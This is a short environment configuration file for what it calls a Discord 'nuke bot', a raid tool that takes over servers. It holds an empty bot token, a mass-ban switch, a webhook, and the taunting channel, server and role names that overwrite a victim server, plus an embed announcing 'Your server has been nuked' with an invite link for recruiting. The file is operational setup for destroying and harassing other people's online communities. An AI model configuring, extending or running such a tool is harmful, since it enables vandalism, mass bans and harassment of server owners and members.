BOT_TOKEN=""
BOT_OWNER_ID=""

MASS_BAN=false

WEBHOOK_URL="Webhook URL"
AVATAR_URL="https://media.tenor.com/PLanFqEsRMAAAAAM/baracube-trolled.gif"
CHANNEL_NAME="AVCII & RBC ON TOP"
SERVER_NAME="AVCII  & RBC THE GOD OF GOD"
ROLE_NAME="AVCII GOD AND RBC GOD"


EMBED_TITLE=" Your server has been nuked by Avci & Rbc "
EMBED_DESCRIPTION="AVCII & RBC  is one of the most powerful discord nuke bot. make ticket and ask for role  https://discord.com.gg/123demand"
